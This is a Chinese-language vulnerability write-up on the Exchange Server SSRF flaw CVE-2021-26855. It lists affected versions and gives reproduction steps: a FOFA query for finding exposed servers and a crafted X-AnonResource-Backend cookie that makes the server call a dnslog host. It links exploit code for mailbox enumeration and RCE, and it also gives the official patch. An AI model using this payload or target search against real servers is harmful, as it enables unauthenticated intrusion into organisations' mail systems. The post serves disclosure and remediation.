漏洞简介
Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。
影响版本
Exchange 2013 Versions < 15.00.1497.012,
Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009,
Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010。
漏洞复现
使用FOFA搜索:app=“Microsoft-Exchange”
访问搜索到的outlook页面
访问url为:https://xx.xx.xx.xx/owa/auth/x.js(x.js可以随便构造)
构造Cookie信息为:
X-AnonResource=true; X-AnonResource-Backend=dnslog的地址/ecp/default.flt?~3
执行,刷新dnslog即可看到信息。
获取邮箱信息
可使用的exp地址:https://github.com/charlottelatest/CVE-2021-26855
可猜解正确的用户名
RCE
exp地址:https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855 Exchange RCE/exp.py
修复方案
升级到最新安全版本,微软官方已针对该批漏洞发布相关安全更新补丁,可按照以下链接进行升级:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855。
参考文章
https://www.freebuf.com/articles/web/265539.html
https://mp.weixin.qq.com/s/kFMfKZTfGtmr9FevGAqwrw
请登录后查看回复内容